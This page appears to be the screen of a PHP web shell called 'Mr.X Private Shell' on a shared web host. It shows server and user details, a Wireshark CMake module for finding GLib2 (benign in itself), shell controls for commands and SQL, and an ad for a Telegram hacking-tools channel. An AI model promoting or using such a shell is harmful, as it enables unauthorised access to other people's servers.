Uname: Linux premium294.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: 768 (artoqlkw)
Group: 773 (artoqlkw)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//lib64/wireshark      ( Reset | Go to )
File Name: FindGLIB2.cmake
#
# - Try to find the GLIB2 libraries
# Once done this will define
#
#  GLIB2_FOUND        - system has glib2
#  GLIB2_INCLUDE_DIRS - the glib2 include directory
#  GLIB2_LIBRARIES    - glib2 library
#  GLIB2_DLL_DIR      - (Windows) Path to required GLib2 DLLs.
#  GLIB2_DLLS         - (Windows) List of required GLib2 DLLs.

# Copyright (c) 2008 Laurent Montel, <[email protected]>
#
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.


if( GLIB2_MAIN_INCLUDE_DIR AND GLIB2_LIBRARIES )
    # Already in cache, be silent
    set( GLIB2_FIND_QUIETLY TRUE )
endif()

include( FindWSWinLibs )

if( ENABLE_GTK3 )
    FindWSWinLibs( "gtk3" "GLIB2_HINTS" )
else()
    FindWSWinLibs( "gtk2" "GLIB2_HINTS" )
endif()

if (NOT WIN32)
    find_package(PkgConfig)

    if( GLIB2_MIN_VERSION )
        pkg_search_module( GLIB2 glib-2.0>=${GLIB2_MIN_VERSION} )
    else()
        pkg_search_module( GLIB2 glib-2.0 )
    endif()
endif()

find_path( GLIB2_MAIN_INCLUDE_DIR
    NAMES
        glib.h
    HINTS
        "${GLIB2_INCLUDEDIR}"
        "${GLIB2_HINTS}/include"
    PATH_SUFFIXES
        glib-2.0
        glib-2.0/include
    PATHS
        /opt/gnome/include
        /opt/local/include
        /sw/include
        /usr/include
        /usr/local/include
)

find_library( GLIB2_LIBRARY
    NAMES
        glib-2.0
        libglib-2.0
    HINTS
        "${GLIB2_LIBDIR}"
        "${GLIB2_HINTS}/lib"
    PATHS
        /opt/gnome/lib64
        /opt/gnome/lib
        /opt/lib/
        /opt/local/lib
        /sw/lib/
        /usr/lib64
        /usr/lib
)

# search the glibconfig.h include dir under the same root where the library is found
get_filename_component( glib2LibDir "${GLIB2_LIBRARY}" PATH)

find_path( GLIB2_INTERNAL_INCLUDE_DIR
    NAMES
        glibconfig.h
    HINTS
        "${GLIB2_INCLUDEDIR}"
        "${glib2LibDir}"
        ${CMAKE_SYSTEM_LIBRARY_PATH}
    PATH_SUFFIXES
        glib-2.0/include
    PATHS
        ${GLIB2_LIBRARY}

)

include( FindPackageHandleStandardArgs )
find_package_handle_standard_args( GLIB2
    DEFAULT_MSG
    GLIB2_LIBRARY
    GLIB2_MAIN_INCLUDE_DIR
)

if( GLIB2_FOUND )
    set( GLIB2_LIBRARIES ${GLIB2_LIBRARY} )
    set( GLIB2_INCLUDE_DIRS ${GLIB2_MAIN_INCLUDE_DIR} ${GLIB2_INTERNAL_INCLUDE_DIR} )
    if ( WIN32 AND GLIB2_FOUND )
        set ( GLIB2_DLL_DIR "${GLIB2_HINTS}/bin"
            CACHE PATH "Path to GLib 2 DLLs"
        )
        file( GLOB _glib2_dlls RELATIVE "${GLIB2_DLL_DIR}"
            "${GLIB2_DLL_DIR}/libglib-*.dll"
            "${GLIB2_DLL_DIR}/libgio-*.dll"
            "${GLIB2_DLL_DIR}/libgmodule-*.dll"
            "${GLIB2_DLL_DIR}/libgobject-*.dll"
            "${GLIB2_DLL_DIR}/libintl-*.dll"
            "${GLIB2_DLL_DIR}/libgcc_s_*.dll"
        )
        set ( GLIB2_DLLS ${_glib2_dlls}
            # We're storing filenames only. Should we use STRING instead?
            CACHE FILEPATH "GLib 2 DLL list"
        )
        mark_as_advanced( GLIB2_DLL_DIR GLIB2_DLLS )
    endif()
elseif( GLIB2_FIND_REQUIRED )
    message( SEND_ERROR "Package required but not found" )
else()
    set( GLIB2_LIBRARIES )
    set( GLIB2_MAIN_INCLUDE_DIRS )
    set( GLIB2_DLL_DIR )
    set( GLIB2_DLLS )
endif()

mark_as_advanced( GLIB2_INCLUDE_DIRS GLIB2_LIBRARIES )

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL